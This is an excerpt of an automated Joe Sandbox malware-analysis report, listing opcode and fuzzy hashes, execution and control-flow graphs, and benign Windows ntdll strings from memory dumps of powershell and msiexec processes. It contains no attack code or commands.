                                                                        • Instruction Fuzzy Hash: 43F159B17043058FC7248B7885117AABBF5AFC2350F15C86AD719CB351DB31E945CBA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$$]q$$]q
                                                                        • API String ID: 0-451802133
                                                                        • Opcode ID: 8fe2db5b1e937859f96d6aa00677a47c2340e17ab51756b8ed178d15c3f68a80
                                                                        • Instruction ID: 72b90fc2ab45eb65352ca9dce3ba931e78015f73517e3784e40b61f360c69a69
                                                                        • Opcode Fuzzy Hash: 8fe2db5b1e937859f96d6aa00677a47c2340e17ab51756b8ed178d15c3f68a80
                                                                        • Instruction Fuzzy Hash: 9C414DB160938ADFC7298F288B502657FF1BF42690F594897C684CB393D7358945C762
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                        • API String ID: 0-2353078639
                                                                        • Opcode ID: dc16f70b57078da4a29456de7176334dda788f191b74105755f90091d7d99659
                                                                        • Instruction ID: 544bdd3d7d94436cfe320b3398673a91d235480b001a0e9568d518b614cfab3e
                                                                        • Opcode Fuzzy Hash: dc16f70b57078da4a29456de7176334dda788f191b74105755f90091d7d99659
                                                                        • Instruction Fuzzy Hash: 8C3133F2B04317CFCB394A699A702B6B7E6AFC6191B24486BCB41CB345DA35C445C7A2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$tP]q$$]q$$]q$$]q
                                                                        • API String ID: 0-2702571027
                                                                        • Opcode ID: ada3eede91e14f4bdd58edf60a174450da7e58df8cf521976d66a2ce10afce8c
                                                                        • Instruction ID: b8d88803f1d7458cb581d48ba6077446998898deb6e59eca8c50b37c8b2a840b
                                                                        • Opcode Fuzzy Hash: ada3eede91e14f4bdd58edf60a174450da7e58df8cf521976d66a2ce10afce8c
                                                                        • Instruction Fuzzy Hash: 1641C4B0A15206EBDB24CF15C740B79B7B2EB857A0F18C866EA555B390C731E941CB53
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$d%cq$d%cq$d%cq$tP]q
                                                                        • API String ID: 0-1723543176
                                                                        • Opcode ID: 7d77b36a4113b23f47a661b49a9b578d086674c84091737f16a10449d8450460
                                                                        • Instruction ID: 8eede6d4eb7f9710d9c3d92132b7033f0bd80694ed3234bc234df41de2487343
                                                                        • Opcode Fuzzy Hash: 7d77b36a4113b23f47a661b49a9b578d086674c84091737f16a10449d8450460
                                                                        • Instruction Fuzzy Hash: F231B3B1B10104DFC734DF68C9A4A5ABBB2FF88750F258959EA056B350C731DC42CB91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (o]q$(o]q$(o]q$(o]q
                                                                        • API String ID: 0-1261621458
                                                                        • Opcode ID: 120ced9bb22f274d60fcccce11ad0af1046f18e34b5f084fd42815318357e95d
                                                                        • Instruction ID: c0c36ba8d0b4830adaafa357c7b59db80af97a1223e9c69b59ee959b05ab6068
                                                                        • Opcode Fuzzy Hash: 120ced9bb22f274d60fcccce11ad0af1046f18e34b5f084fd42815318357e95d
                                                                        • Instruction Fuzzy Hash: D6F148B170430ADFDB16CF68CA50BAA7BE1EF86350F14886AE6158B391DB31D845C7B1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $]q$$]q$$]q$$]q
                                                                        • API String ID: 0-858218434
                                                                        • Opcode ID: c228171ec2811fb2c9b76a93f24eae75bbf388c34a603a956fc5796f05f9cefe
                                                                        • Instruction ID: 5a39c86b18365f211ebecff8cac115c7f3448b3e71266294a7a810329eca7710
                                                                        • Opcode Fuzzy Hash: c228171ec2811fb2c9b76a93f24eae75bbf388c34a603a956fc5796f05f9cefe
                                                                        • Instruction Fuzzy Hash: C82137B131024ADBDB38556A8A50B27B6DAAFC1655FA48C2AAA05C7381DD76C841C361
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $]q$$]q$$]q$$]q
                                                                        • API String ID: 0-858218434
                                                                        • Opcode ID: a5133f774bd7732ede76b9082f747be734816bbef80e435fa898d99af92515a9
                                                                        • Instruction ID: fc7c50ca312b783bbea2bf627d401986a6adf351938c61023e304116528d2239
                                                                        • Opcode Fuzzy Hash: a5133f774bd7732ede76b9082f747be734816bbef80e435fa898d99af92515a9
                                                                        • Instruction Fuzzy Hash: BC11B1F1A14307DBDB348F59C74167AB7F5AB86691F1848BACA448B301D731C585C793
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$$]q$$]q
                                                                        • API String ID: 0-978391646
                                                                        • Opcode ID: 5ba4b07e162fe7b816fda3bf59c8b89460f4ff621e0143a857181d1829b639ea
                                                                        • Instruction ID: ad887d94775fd3d14b763265832ed8b73c1b6e7ac86cf67fd54c05cef59fede0
                                                                        • Opcode Fuzzy Hash: 5ba4b07e162fe7b816fda3bf59c8b89460f4ff621e0143a857181d1829b639ea
                                                                        • Instruction Fuzzy Hash: 3B0126707083899FC33E422C19202A56FF68FC3850F6A09EBC191DF3A7CD158C0683A6

                                                                        Execution Graph

                                                                        Execution Coverage:0%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:23.1%
                                                                        Total number of Nodes:108
                                                                        Total number of Limit Nodes:0
execution_graph (one node per line: node ID, address, API/library call counts, annotations)
• 66252 2212a210 7 API calls
• 66253 220eea0c 590 API calls __startOneArgErrorHandling
• 66389 22171810 551 API calls
• 66255 2217321f 374 API calls 2 library calls
• 66256 2216da1d 325 API calls _vswprintf_s
• 66390 22128402 551 API calls 2 library calls
• 66258 22128600 7 API calls
• 66392 2212cc00 332 API calls
• 66263 220e8210 191 API calls
• 66399 2212a430 408 API calls _vswprintf_s
• 66402 22175430 9 API calls _vswprintf_s
• 66403 2212bc3b 327 API calls __startOneArgErrorHandling
• 66404 220ea020 324 API calls
• 66405 220ec020 10 API calls
• 66406 220ee420 400 API calls __startOneArgErrorHandling
• 66270 2210e627 347 API calls __except_handler4
• 66410 22176020 325 API calls
• 66411 22176420 331 API calls __startOneArgErrorHandling
• 66272 22128e2f 351 API calls
• 66273 220fba30 541 API calls
• 66413 2211b052 352 API calls 2 library calls
• 66414 2216f450 190 API calls
• 66415 2219705e 567 API calls __except_handler4
• 66416 22176050 323 API calls _vswprintf_s
• 66417 220e7440 5 API calls __startOneArgErrorHandling
• 66277 2210fa40 556 API calls 2 library calls
• 66278 22127a40 327 API calls
• 66418 220e645d 552 API calls __startOneArgErrorHandling
• 66421 220f2050 346 API calls
• 66423 22129870 402 API calls
• 66249 22132c70 LdrInitializeThunk
• 66286 220e826b 349 API calls __startOneArgErrorHandling
• 66424 220eec6b 589 API calls
• 66425 2216d070 191 API calls
• 66426 2216f87e 326 API calls
• 66287 220e9660 551 API calls
• 66289 22129660 559 API calls __startOneArgErrorHandling
• 66294 220e7a80 344 API calls __startOneArgErrorHandling
• 66437 2212909c 345 API calls 2 library calls
• 66438 220eb480 196 API calls
• 66296 22146282 328 API calls
• 66298 22123e8f 326 API calls
• 66443 220eb890 548 API calls
• 66299 220f1ea0 16 API calls
• 66300 221052a0 372 API calls 2 library calls
• 66447 2212bca0 539 API calls
• 66303 2212c6a6 550 API calls 2 library calls
• 66448 2216cca0 328 API calls
• 66449 220e78b0 192 API calls
• 66305 2216daa9 341 API calls __startOneArgErrorHandling
• 66450 220f3cb0 14 API calls
• 66308 220eb2c0 343 API calls
• 66310 2211eac0 340 API calls
• 66454 2210ccc2 199 API calls
• 66455 2216d0c0 324 API calls __swprintf_c_l
• 66314 22171acb 192 API calls 2 library calls
• 66457 221320f0 8 API calls __startOneArgErrorHandling
• 66459 221754f0 553 API calls 2 library calls
• 66317 220ea2e0 535 API calls 2 library calls
• 66318 2211d6e0 690 API calls 2 library calls
• 66320 220efef0 11 API calls
• 66464 220ec0f0 343 API calls
• 66465 220f24f0 598 API calls
• 66466 220f98f0 575 API calls
• 66322 22127b13 706 API calls
• 66469 220ee104 348 API calls
• 66470 220f2102 202 API calls
• 66327 220e8300 325 API calls
• 66328 220ebf00 334 API calls
• 66471 220f0100 564 API calls 2 library calls
• 66478 220eb120 410 API calls
• 66479 22174d39 329 API calls 2 library calls
• 66337 220f3720 337 API calls __startOneArgErrorHandling
• 66338 2211eb20 348 API calls
• 66339 2212f320 328 API calls __startOneArgErrorHandling
• 66342 220e7330 323 API calls _vswprintf_s
• 66349 22172349 585 API calls 2 library calls
• 66350 2210d770 6 API calls __startOneArgErrorHandling
• 66489 2212b970 367 API calls
• 66352 2219437c 327 API calls
• 66353 22176b70 329 API calls
• 66358 220fc770 GetPEB __except_handler4
• 66495 2216e190 LdrInitializeThunk __startOneArgErrorHandling
• 66359 221a9793 8 API calls __startOneArgErrorHandling
• 66360 220ebf80 348 API calls __startOneArgErrorHandling
• 66361 220f0780 348 API calls
• 66365 22132380 705 API calls __startOneArgErrorHandling
• 66366 220ea790 410 API calls
• 66497 2211f5b0 336 API calls 3 library calls
• 66500 220ec1a0 332 API calls
• 66369 221233a0 329 API calls __startOneArgErrorHandling
• 66503 22126da0 330 API calls
• 66510 2211add0 333 API calls
• 66511 2211cdd0 GetPEB GetPEB
• 66372 221263d0 597 API calls 2 library calls
• 66373 221297d0 330 API calls
• 66514 2216e1d0 195 API calls __swprintf_c_l
• 66515 2216d5d0 326 API calls _vswprintf_s
• 66516 220f59c0 777 API calls 2 library calls
• 66517 221165c0 416 API calls _vswprintf_s
• 66375 221707c3 346 API calls 2 library calls
• 66377 221763c0 334 API calls
• 66520 220ec1d0 589 API calls
• 66380 2211c3f0 329 API calls
• 66382 2211cbf0 GetPEB GetPEB GetPEB GetPEB
• 66526 220e81e6 7 API calls
• 66529 221259e0 328 API calls
• 66532 221719ee GetPEB GetPEB GetPEB

                                                                        Control-flow Graph (nodes marked Executed / Not Executed)
                                                                        control_flow_graph 1 221335c0-221335cc LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f53bb898850c6d0e095bd48fa1065724ba7cda4ab9fd6f2610c4b50932698642
                                                                        • Instruction ID: ef141936066e31ed17c9118ea116d4d969ceb0caab14b9537c2b5049cc0514f8
                                                                        • Opcode Fuzzy Hash: f53bb898850c6d0e095bd48fa1065724ba7cda4ab9fd6f2610c4b50932698642
                                                                        • Instruction Fuzzy Hash: EC900231A4564402D10071584954B06140547D0201FB6C412A0465528D8BD58B51A5A2

                                                                        Control-flow Graph (nodes marked Executed / Not Executed)
                                                                        control_flow_graph 0 22132c70-22132c7c LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: bda04a84ccec9793c1b518d3fd75ce479e4fea9e2eff68c7684a66aaaeeddf9f
                                                                        • Instruction ID: b6e765effc8423570cf5d6c4107a38d2f234878efcad6cfd24ade13963d89dde
                                                                        • Opcode Fuzzy Hash: bda04a84ccec9793c1b518d3fd75ce479e4fea9e2eff68c7684a66aaaeeddf9f
                                                                        • Instruction Fuzzy Hash: 949002316415C802D11071588844B4A040547D0301FAAC412A4465618D8AD58A91B121
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-2160512332
                                                                        • Opcode ID: b6bc05a2f18d6cdcbd7e45996973e442a83d7f65e1884e22da26f7557cc0744a
                                                                        • Instruction ID: 159fd3a2aef1cdc35522ad65437c1fc9b5146d70f5b1c4a37d112fd9e9bccc21
                                                                        • Opcode Fuzzy Hash: b6bc05a2f18d6cdcbd7e45996973e442a83d7f65e1884e22da26f7557cc0744a
                                                                        • Instruction Fuzzy Hash: C3927A71688381AFE325CF20C980F9BB7F8BB84754F10492DFA949B251D7B0DA45CB92

                                                                        Control-flow Graph (nodes marked Executed / Not Executed)
                                                                        control_flow_graph 623 22128620-22128681 624 22165297-2216529d 623->624 625 22128687-22128698 623->625 624->625 626 221652a3-221652b0 GetPEB 624->626 626->625 627 221652b6-221652b9 626->627 628 221652d6-221652fc call 22132ce0 627->628 629 221652bb-221652c5 627->629 628->625 634 22165302-22165306 628->634 629->625 630 221652cb-221652d4 629->630 632 2216532d-22165341 call 220f54a0 630->632 638 22165347-22165353 632->638 634->625 637 2216530c-22165321 call 22132ce0 634->637 637->625 646 22165327 637->646 640 2216555c-22165568 call 2216556d 638->640 641 22165359-2216536d 638->641 640->625 644 2216536f 641->644 645 2216538b-22165401 641->645 648 22165371-22165378 644->648 651 22165403-22165435 call 220efd50 645->651 652 2216543a-2216543d 645->652 646->632 648->645 650 2216537a-2216537c 648->650 653 22165383-22165385 650->653 654 2216537e-22165381 650->654 665 2216554d-22165552 call 2217a4b0 651->665 656 22165514-22165517 652->656 657 22165443-22165494 652->657 653->645 658 22165555-22165557 653->658 654->648 656->658 659 22165519-22165548 call 220efd50 656->659 662 22165496-221654cc call 220efd50 657->662 663 221654ce-22165512 call 220efd50 * 2 657->663 658->638 659->665 662->665 663->665 665->658
                                                                        Strings
                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 221654CE
                                                                        • Critical section debug info address, xrefs: 2216541F, 2216552E
                                                                        • Critical section address, xrefs: 22165425, 221654BC, 22165534
                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 221654E2
                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 2216540A, 22165496, 22165519
                                                                        • 8, xrefs: 221652E3
                                                                        • undeleted critical section in freed memory, xrefs: 2216542B
                                                                        • Invalid debug info address of this critical section, xrefs: 221654B6
                                                                        • double initialized or corrupted critical section, xrefs: 22165508
                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 22165543
                                                                        • corrupted critical section, xrefs: 221654C2
                                                                        • Address of the debug info found in the active list., xrefs: 221654AE, 221654FA
                                                                        • Critical section address., xrefs: 22165502
                                                                        • Thread identifier, xrefs: 2216553A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                        • API String ID: 0-2368682639
                                                                        • Opcode ID: d537fba30fb8509db6fc8588b7f739a0a18b5c365a14436285d17d7442103dd6
                                                                        • Instruction ID: 70fb9635ea0ddd95eade5294f60ded77f3431a74ae33e69dcc6cf99f6360cc1b
                                                                        • Opcode Fuzzy Hash: d537fba30fb8509db6fc8588b7f739a0a18b5c365a14436285d17d7442103dd6
                                                                        • Instruction Fuzzy Hash: D58189B1A41358FFEB10CF95C984FAEBBB5EB48714F514119F608B7240D335AA41DBA4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                        • API String ID: 0-3591852110
                                                                        • Opcode ID: eab8ad7dc95ef6a6b406f0f2bbea2769cae342f69379cf3a80d3afd037cd1600
                                                                        • Instruction ID: 4616c73df2c06f6272600dec05dc77d96c8070af862ab3103ff87c4542c6c29e
                                                                        • Opcode Fuzzy Hash: eab8ad7dc95ef6a6b406f0f2bbea2769cae342f69379cf3a80d3afd037cd1600
                                                                        • Instruction Fuzzy Hash: 5512DC78640742DFD7158F68C5A0FBABBF2FF19314F048459E49A8B662D734EA80DB90

                                                                        Control-flow Graph (nodes marked Executed / Not Executed)
                                                                        control_flow_graph 1758 220ed34c-220ed38d 1759 2214a90d 1758->1759 1760 220ed393-220ed395 1758->1760 1762 2214a917-2214a930 call 221ac188 1759->1762 1760->1759 1761 220ed39b-220ed39e 1760->1761 1761->1759 1763 220ed3a4-220ed3ac 1761->1763 1770 2214a936-2214a939 1762->1770 1771 220ed5ca-220ed5cd 1762->1771 1765 220ed3ae-220ed3b0 1763->1765 1766 220ed3b6-220ed401 call 22135130 call 22132b90 1763->1766 1765->1766 1768 2214a867-2214a86c 1765->1768 1783 2214a871-2214a88b call 220e7270 1766->1783 1784 220ed407-220ed410 1766->1784 1773 220ed620-220ed628 1768->1773 1775 220ed5ad-220ed5af 1770->1775 1774 220ed5cf-220ed5d5 1771->1774 1778 220ed69b-220ed69d 1774->1778 1779 220ed5db-220ed5e8 GetPEB call 22103ca0 1774->1779 1775->1771 1777 220ed5b1-220ed5c4 call 22113342 1775->1777 1777->1771 1792 2214a93e-2214a943 1777->1792 1785 220ed5ed-220ed5f2 1778->1785 1779->1785 1799 2214a895-2214a899 1783->1799 1800 2214a88d-2214a88f 1783->1800 1789 220ed41a-220ed42d call 220ed796 1784->1789 1790 220ed412-220ed414 1784->1790 1787 220ed5f4-220ed5fd call 22132b60 1785->1787 1788 220ed601-220ed606 1785->1788 1787->1788 1795 220ed608-220ed611 call 22132b60 1788->1795 1796 220ed615-220ed61a 1788->1796 1810 2214a8c9 1789->1810 1811 220ed433-220ed437 1789->1811 1790->1789 1794 2214a8a1-2214a8ac call 221ab1e1 1790->1794 1792->1771 1794->1789 1814 2214a8b2-2214a8c4 1794->1814 1795->1796 1796->1773 1801 2214a948-2214a94c call 22132b60 1796->1801 1799->1794 1800->1799 1806 220ed58e 1800->1806 1815 2214a951 1801->1815 1816 220ed590-220ed595 1806->1816 1819 2214a8d1-2214a8d3 1810->1819 1812 220ed43d-220ed457 call 220ed930 1811->1812 1813 220ed62b-220ed683 call 22135130 call 22132b90 1811->1813 1812->1819 1826 220ed45d-220ed4ae call 22135130 call 22132b90 1812->1826 1832 220ed685 1813->1832 1833 220ed6a2-220ed6a5 1813->1833 1814->1789 1815->1815 1820 220ed5a9 1816->1820 1821 220ed597-220ed599 1816->1821 1819->1771 1824 2214a8d9 
1819->1824 1820->1775 1821->1762 1825 220ed59f-220ed5a3 1821->1825 1830 2214a8de 1824->1830 1825->1762 1825->1820 1826->1810 1838 220ed4b4-220ed4bd 1826->1838 1835 2214a8e8-2214a8ed 1830->1835 1837 220ed68f-220ed696 1832->1837 1833->1806 1835->1778 1837->1816 1838->1830 1839 220ed4c3-220ed4f2 call 22135130 call 220ed6aa 1838->1839 1839->1837 1844 220ed4f8-220ed4fe 1839->1844 1844->1837 1845 220ed504-220ed50a 1844->1845 1845->1778 1846 220ed510-220ed52c GetPEB call 22105e70 1845->1846 1846->1835 1849 220ed532-220ed54f call 220ed6aa 1846->1849 1852 220ed586-220ed58c 1849->1852 1853 220ed551-220ed556 1849->1853 1852->1774 1852->1806 1854 220ed55c-220ed584 call 22114d86 1853->1854 1855 2214a8f2-2214a8f7 1853->1855 1854->1852 1855->1854 1856 2214a8fd-2214a908 1855->1856 1856->1816
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                        • API String ID: 0-3532704233
                                                                        • Opcode ID: 27aac8cbd0b8509ee251c6aea4be64fc3768a1578fcdf4662aa6880ae6d1fa17
                                                                        • Instruction ID: d63bfd6729842d5d113377ec617b80d5ca015d443ac3b3bc4b021616c7c379c5
                                                                        • Opcode Fuzzy Hash: 27aac8cbd0b8509ee251c6aea4be64fc3768a1578fcdf4662aa6880ae6d1fa17
                                                                        • Instruction Fuzzy Hash: 57B189B29483519FC715CF24C990B5FBBE8EB88758F01492EF989D7240D734DA84EB92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                        • API String ID: 0-3063724069
                                                                        • Opcode ID: b16e708433a1d6b237e014b56a4be152094822df1afe8b2f1967063245bf9faa
                                                                        • Instruction ID: 8a518926db87078318399190ab2d5285577fc6db74c6894fc1693750633905bc
                                                                        • Opcode Fuzzy Hash: b16e708433a1d6b237e014b56a4be152094822df1afe8b2f1967063245bf9faa
                                                                        • Instruction Fuzzy Hash: C6D1E3B2885395AFE331CA60C9C4F9BB7E9AF94714F000929FA9497254D770CB048BD3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                        • API String ID: 0-1700792311
                                                                        • Opcode ID: 65fa63d8a43564e9010512a45800c669e14a984f9f2290711814d39c6d805746
                                                                        • Instruction ID: 51c4805e7141c953d2f863521088cdba876cf153bedc4ccd2d14069ea8f9d9b8
                                                                        • Opcode Fuzzy Hash: 65fa63d8a43564e9010512a45800c669e14a984f9f2290711814d39c6d805746
                                                                        • Instruction Fuzzy Hash: 3ED1AB39A80795DFCB01CFA8C461FAEBBF1FF5A304F058459E8499B252C7349A81DB54
                                                                        Strings
                                                                        • @, xrefs: 220ED313
                                                                        • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 220ED0CF
                                                                        • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 220ED146
                                                                        • @, xrefs: 220ED2AF
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 220ED2C3
                                                                        • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 220ED262
